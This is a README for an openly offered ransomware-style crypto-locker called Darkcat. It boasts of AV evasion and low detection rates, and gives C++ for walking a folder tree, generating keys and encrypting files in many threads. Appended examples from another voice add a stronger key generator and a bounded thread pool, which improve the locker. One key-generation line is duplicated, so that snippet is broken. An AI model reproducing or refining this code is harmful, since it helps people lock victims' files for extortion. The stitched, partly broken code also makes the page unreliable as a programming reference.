DARKCAT Project - A Strong Prototype Crypto-Locker

DISCLAIMER: This tool is intended for educational purposes only. The author assumes no responsibility or liability for any damages caused by the execution of this algorithm, use at your own risk.


Darkcat is an open-source crypto-locker aimed at readers with an interest in cyber security. It works the way the more obnoxious ransomware families do, using 2-layer key encryption with the intent of making it almost impossible to recover any key from memory, even while encryption is in progress. It uses multi-threaded 128-bit AES encryption, which makes it very fast at the cost of leaving a CPU footprint that modern behaviour-based antivirus software can pick up on. My Kaspersky didn't detect any suspicious activity in most runs, especially ones that didn't involve lots of files. Note that the program prints the keys to the console but does not save them anywhere, so if that console output is lost the files are not recoverable; use at your own risk.

/*   -0-    ,    *     o    .     *    .    o    .  -O-   '  *  . o
 *  .  '     ____  ____  ____  _  __ ____  ____  _____  .  '  ,  *
 *     .  * /  _ \/  _ \/  __\/ |/ //   _\/  _ \/__ __\  *  . |  '
 *  *     . | | \|| / \||  \/||   / |  /  | / \|  / \  '  ,  o  '
 *  .  '    | |_/|| |-|||    /|   \ |  \_ | |-||  | | ' |   *   .
 *  '  *  . \____/\_/ \|\_/\_\\_|\_\\____/\_/ \|  \_/ *     .    o
 *  *    '  ,     '     .    -0-    .    *    .  ' |   ,   *    '
 * Alexander
 * Toepfer 2020
 */


Summary

  1. AV Evasion techniques used to bypass Engines.
  2. Fetching files recursively from a given root directory.
  3. Generation of 128-bit Keys used for Encryption.
  4. Multi-threaded Encryption applied on sorted vector of files.

AV Evasion techniques

Darkcat evades AV engines with three techniques: behaviour obfuscation, data encryption and sandbox detection. Together they deal fairly well with most engines that analyze the binary statically or execute it, but the result is still far from perfect: some of the more elaborate products, which classify behaviour with machine-learning models, still flag the activity, so this implementation is not FUD (fully undetectable). All three techniques are left out of the code snippets below, as otherwise the source code would be unreadable.

Fetching files from directory

    #include <algorithm>
    #include <filesystem>
    #include <string>
    #include <vector>

    /* Set elsewhere in the program (declared here only so the snippet compiles):
       the mode, the name of the key file and the extension given to encrypted files */
    bool encrypt = true;
    std::string keyfilestr;
    std::string fileExtension;

    std::string path = "C:\\Path\\To\\Testfolder";
    /* First loop identifying files */
    std::vector< file > files;
    for( const auto& entry : std::filesystem::recursive_directory_iterator( path ) ) {
        if( std::filesystem::is_regular_file( entry.path() ) ) {
            /* Ignore any keyfiles in the directory */
            if( entry.path().filename() == keyfilestr )
                continue;
            /* Ignore certain files in certain modes: when encrypting, skip files that
               already carry the encrypted extension; when decrypting, skip all others */
            if( ( ( entry.path().extension() == fileExtension ) && encrypt ) ||
                ( ( entry.path().extension() != fileExtension ) && !encrypt ) )
                continue;
            file f( entry.path(), std::filesystem::file_size( entry.path() ) );
            /* Ignore files that are included already (needs file::operator==) */
            if( std::find( files.begin(), files.end(), f ) != files.end() )
                continue;
            files.push_back( f );
        }
    }
    /* Sort by size with file::operator<() */
    std::sort( files.begin(), files.end() );

You could also do this with Boost.Filesystem instead; it comes down to preference. You will also need a small file class for this snippet to work, storing the path and size and providing operator== (for the duplicate check) and operator< (for the sort). That is not really a requirement, so feel free to use an array of std::filesystem::path if that fits your needs. Two caveats on recursive_directory_iterator: by default it throws std::filesystem::filesystem_error on the first directory it cannot read (pass std::filesystem::directory_options::skip_permission_denied to skip those instead of aborting the whole walk), and it does not descend into directory symlinks unless follow_directory_symlink is set.

128-bit Key Generation

#include <algorithm>
#include <random>
#include <string>

/* Defined elsewhere: returns the characters a key may be drawn from */
std::string charset();

std::string randomString( size_t length ) {
    const auto chset = charset();
    /* Seeded once with a single unsigned int from std::random_device;
       the engine itself is a general-purpose PRNG, not a CSPRNG */
    std::default_random_engine rng( std::random_device{}() );
    /* Uniformly distributed indices on the closed interval [0, chset.size() - 1] */
    std::uniform_int_distribution< size_t > dist( 0, chset.size() - 1 );
    /* Returns a random character from the charset */
    auto randchar = [ &chset, &dist, &rng ]() { return chset[ dist( rng ) ]; };
    std::string str( length, '\0' );
    std::generate_n( str.begin(), length, randchar );
    return str;
}
std::string key1 = randomString( 16 ), key2 = randomString( 16 );
std::string key1 = randomString( 16 ), key2 = randomString( 16 );

You could also use rand() with modulo here to generate the indices into the charset, but I prefer this solution, even though seeding the engine is a complete nightmare and the standard makes no guarantees about its quality, efficiency or repeatability between implementations. Two things to be aware of: std::default_random_engine is a general-purpose PRNG rather than a CSPRNG, and it is seeded here with one unsigned int from std::random_device, so every key it produces is a function of 32 bits of seed no matter how long the string is. And 16 characters drawn from a printable charset carry fewer than 128 bits of entropy (about 95 bits if charset() returns the 62 alphanumerics), even when those 16 bytes are used directly as the AES-128 key.
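As an added example (not from the DARKCAT source), the same construction with its seed made explicit, a brute-force that recovers the seed from a finished key, and a replacement that takes every key byte from std::random_device. The alphabet kCharset is an assumption, since the page's charset() helper is not shown, and seededKey stands in for randomString. Caveat: std::random_device reads the OS CSPRNG on MSVC, libstdc++ and libc++, but older MinGW-w64 builds shipped a deterministic one, so check the toolchain before relying on it.

```cpp
// Added example, not DARKCAT code. Shows that a key drawn from a seeded
// std::default_random_engine is bounded by its 32-bit seed, next to a
// version that takes every byte from the operating system's entropy source.
#include <algorithm>
#include <array>
#include <cstdint>
#include <random>
#include <string>

// Assumed alphabet; the page's charset() helper is not shown.
static const std::string kCharset =
    "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

// Same construction as randomString(), but the seed is a parameter so the
// dependence on it is visible: the engine state is fully determined by
// `seed`, so there are at most 2^32 possible keys whatever `length` is.
std::string seededKey( std::uint32_t seed, size_t length ) {
    std::default_random_engine rng( seed );
    std::uniform_int_distribution< size_t > dist( 0, kCharset.size() - 1 );
    std::string key( length, '\0' );
    std::generate_n( key.begin(), length, [ & ]() { return kCharset[ dist( rng ) ]; } );
    return key;
}

// Recovers the seed behind `key` by trying every seed in [lo, hi].
// Returns the seed, or -1 if none in the range reproduces the key. This works
// only because the key is a deterministic function of a small seed.
long long recoverSeed( const std::string& key, std::uint32_t lo, std::uint32_t hi ) {
    for( std::uint64_t s = lo; s <= hi; ++s ) {
        if( seededKey( static_cast< std::uint32_t >( s ), key.size() ) == key )
            return static_cast< long long >( s );
    }
    return -1;
}

// Hardened: 16 raw bytes, each 32-bit word taken directly from
// std::random_device. No seed and no engine state, so there is nothing
// smaller than the key itself to search.
std::array< unsigned char, 16 > csprngKey() {
    std::random_device rd;
    std::array< unsigned char, 16 > key{};
    for( size_t i = 0; i < key.size(); i += 4 ) {
        std::uint32_t w = rd();
        for( size_t j = 0; j < 4 && i + j < key.size(); ++j )
            key[ i + j ] = static_cast< unsigned char >( w >> ( 8 * j ) );
    }
    return key;
}

// Hex encoding for logging a raw key (32 hex digits for 16 bytes).
std::string toHex( const std::array< unsigned char, 16 >& key ) {
    static const char* digits = "0123456789abcdef";
    std::string out;
    for( unsigned char b : key ) {
        out += digits[ b >> 4 ];
        out += digits[ b & 0x0F ];
    }
    return out;
}
```

recoverSeed over the full 2^32 range takes minutes on one core for a 16-character key, which is the practical meaning of "32 bits of seed". A raw 16-byte key from csprngKey() is what an AES-128 key should look like; if a printable form is needed for logging, hex-encode the bytes rather than drawing printable characters in the first place.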

Multi-threaded Encryption

#include <thread>
#include <vector>

/* Second loop altering files: one thread per file */
std::vector< std::thread > threads;
for( const auto& f : files ) {
    if( encrypt ) {
        threads.emplace_back( fileEncrypt, f.path, key, iv );
    }
    else ...
}
/* Wait for all threads to finish */
for( auto& t : threads ) {
    t.join();
}

#include <string>
#include <cryptopp/aes.h>      /* <aes.h> etc. on builds that do not use the cryptopp/ prefix */
#include <cryptopp/filters.h>
#include <cryptopp/modes.h>

/* Crypto++ AES-128-CBC encryption of a std::string.
   StreamTransformationFilter applies PKCS#7 padding by default, so the output
   is a whole number of 16-byte blocks. CBC provides confidentiality only;
   there is no integrity check on the ciphertext. */
std::string stringEncrypt( const std::string& plain,
                           const CryptoPP::byte key[ CryptoPP::AES::DEFAULT_KEYLENGTH ],
                           const CryptoPP::byte iv[ CryptoPP::AES::BLOCKSIZE ] ) {
    std::string cipher;
    CryptoPP::AES::Encryption aesEncryption( key, CryptoPP::AES::DEFAULT_KEYLENGTH );
    CryptoPP::CBC_Mode_ExternalCipher::Encryption cbcEncryption( aesEncryption, iv );
    /* The filter takes ownership of the StringSink and writes into `cipher` */
    CryptoPP::StreamTransformationFilter stfEncryptor( cbcEncryption,
                                                       new CryptoPP::StringSink( cipher ) );
    stfEncryptor.Put( reinterpret_cast< const CryptoPP::byte* >( plain.data() ),
                      plain.size() );
    stfEncryptor.MessageEnd();
    return cipher;
}

For AES-128 I didn't write my own implementation, because the solution needs to be reasonably fast and reliable, but a custom implementation could help with AV evasion in the long run, so it is tempting. Two points on how the primitive is used above: the loop passes the same key and iv to every file, and with CBC a repeated IV under one key means files that begin with the same bytes produce the same leading ciphertext blocks; and CBC on its own has no integrity protection, so a modified ciphertext simply decrypts to garbage. Spawning one std::thread per file also scales badly: a directory tree with tens of thousands of files means tens of thousands of threads created at once.
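As an added example (not DARKCAT code), a bounded worker pool that replaces the thread-per-file loop above: a fixed number of workers pull items from a shared index, so the number of threads is independent of the number of files. The Item struct, the in-memory "files" built by makeItems and the reversible xorTransform are all constructed here as stand-ins for the page's file class and fileEncrypt; any per-item function with the same shape can be passed in.

```cpp
// Added example, not DARKCAT code. Bounded concurrency over a vector of items:
// at most `workers` threads, each looping until the shared index runs out.
#include <atomic>
#include <functional>
#include <string>
#include <thread>
#include <vector>

// Stand-in for the page's file class: a name and an in-memory buffer.
struct Item {
    std::string name;
    std::string data;
};

// Applies `work` to every item using at most `workers` threads. Items are
// handed out through an atomic counter, so each is processed exactly once.
// Returns the number of items processed.
size_t forEachBounded( std::vector< Item >& items, size_t workers,
                       const std::function< void( Item& ) >& work ) {
    if( workers == 0 ) workers = 1;
    std::atomic< size_t > next{ 0 };
    std::atomic< size_t > done{ 0 };
    std::vector< std::thread > pool;
    for( size_t w = 0; w < workers; ++w ) {
        pool.emplace_back( [ & ]() {
            for( size_t i = next.fetch_add( 1 ); i < items.size(); i = next.fetch_add( 1 ) ) {
                work( items[ i ] );
                done.fetch_add( 1 );
            }
        } );
    }
    for( auto& t : pool ) t.join();
    return done.load();
}

// Placeholder per-item transform standing in for fileEncrypt (assumed, not AES):
// a position-dependent XOR, chosen because applying it twice restores the input.
void xorTransform( Item& it ) {
    for( size_t i = 0; i < it.data.size(); ++i )
        it.data[ i ] = static_cast< char >( it.data[ i ] ^ static_cast< char >( 0x5A + ( i & 0x0F ) ) );
}

// Constructed sample input: n buffers of varying size and content.
std::vector< Item > makeItems( size_t n ) {
    std::vector< Item > v;
    v.reserve( n );
    for( size_t i = 0; i < n; ++i )
        v.push_back( { "file" + std::to_string( i ),
                       std::string( 64 + i % 100, static_cast< char >( 'a' + i % 26 ) ) } );
    return v;
}

// Runs the transform twice through the pool and checks that every item was
// processed on each pass, was changed by the first pass and restored by the second.
bool roundTrip( size_t n, size_t workers ) {
    std::vector< Item > items = makeItems( n );
    const std::vector< Item > original = items;
    size_t first = forEachBounded( items, workers, xorTransform );
    bool changed = ( n == 0 ) || ( items[ 0 ].data != original[ 0 ].data );
    size_t second = forEachBounded( items, workers, xorTransform );
    bool restored = true;
    for( size_t i = 0; i < n; ++i )
        restored = restored && ( items[ i ].data == original[ i ].data );
    return first == n && second == n && changed && restored;
}
```

A sensible worker count is std::thread::hardware_concurrency() (which may return 0, hence the fallback to one worker inside the function). Because items are handed out in vector order, the size-sorted vector from the first loop still controls which files are touched first.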

VirusTotal (4/70)


Copyright and license

Code and documentation copyright 2021 Alexander Töpfer. Code released under the MIT License.
